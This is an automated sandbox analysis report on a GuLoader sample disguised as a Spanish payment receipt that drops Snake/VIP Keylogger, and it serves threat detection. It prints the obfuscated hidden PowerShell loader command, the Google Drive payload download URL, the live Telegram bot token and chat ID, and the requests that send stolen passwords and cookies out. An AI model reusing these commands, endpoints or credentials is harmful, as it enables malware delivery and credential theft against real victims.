
Windows Analysis Report
Justificante pago-09453256434687.exe

Overview

General Information

Sample name: Justificante pago-09453256434687.exe
Analysis ID: 1576296
MD5: 4252cd5753def4a484fb3313e1029e66
SHA1: 19fd0734102e1eebe6c7f42d530d30e920366e00
SHA256: 96b8248be606c47b8955a560f3df160a4c9026ce1956e407daf177f17549e4f7
Tags: exe, user-threatcat_ch

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Justificante pago-09453256434687.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe" MD5: 4252CD5753DEF4A484FB3313E1029E66)
    • powershell.exe (PID: 7528 cmdline: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8012 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM", "Chat_id": "5234817354", "Version": "4.4"}
Source | Rule | Description | Author
00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.2067270709.0000000009B22000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe", ParentImage: C:\Users\user\Desktop\Justificante pago-09453256434687.exe, ParentProcessId: 7460, ParentProcessName: Justificante pago-09453256434687.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", ProcessId: 7528, ProcessName: powershell.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8012, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Justificante pago-09453256434687.exe", ParentImage: C:\Users\user\Desktop\Justificante pago-09453256434687.exe, ParentProcessId: 7460, ParentProcessName: Justificante pago-09453256434687.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Subwayed=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Forhaandsudtalelses.Pot162';$Raadslagningens=$Subwayed.SubString(68150,3);.$Raadslagningens($Subwayed) ", ProcessId: 7528, ProcessName: powershell.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-12-16T18:28:56.968822+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.67.152 | 443 | TCP
            2024-12-16T18:29:13.174013+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49781 | 104.21.67.152 | 443 | TCP
            2024-12-16T18:28:52.347535+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP
            2024-12-16T18:28:55.285176+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | TCP
            2024-12-16T18:28:58.363210+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 158.101.44.242 | 80 | TCP
            2024-12-16T18:28:44.726551+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 172.217.19.174 | 443 | TCP


            AV Detection

            Source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM", "Chat_id": "5234817354", "Version": "4.4"}
            Source: msiexec.exe.8012.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendMessage"}
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 85.4% probability

            Location Tracking

            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_240187A8 CryptUnprotectData,6_2_240187A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_24018EF1 CryptUnprotectData,6_2_24018EF1
            Source: Justificante pago-09453256434687.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49806 version: TLS 1.2
            Source: Justificante pago-09453256434687.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\c source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.000000000823C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2065851466.0000000008272000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

            Networking

            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2017/12/2024%20/%2019:35:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f5b7140c899Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f89892680e0Host: api.telegram.orgContent-Length: 7046Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 104.21.67.152:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 104.21.67.152:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f5b7140c899Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 Dec 2024 17:29:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2046362099.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
            Source: Justificante pago-09453256434687.exe, Justificante pago-09453256434687.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C35000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C30000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2935464075.0000000020E90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO
            Source: msiexec.exe, 00000006.00000003.2194212584.0000000005F3A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2924097464.0000000005F36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=downloadU
            Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=downloadc
            Source: powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000006.00000002.2936459320.0000000021AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
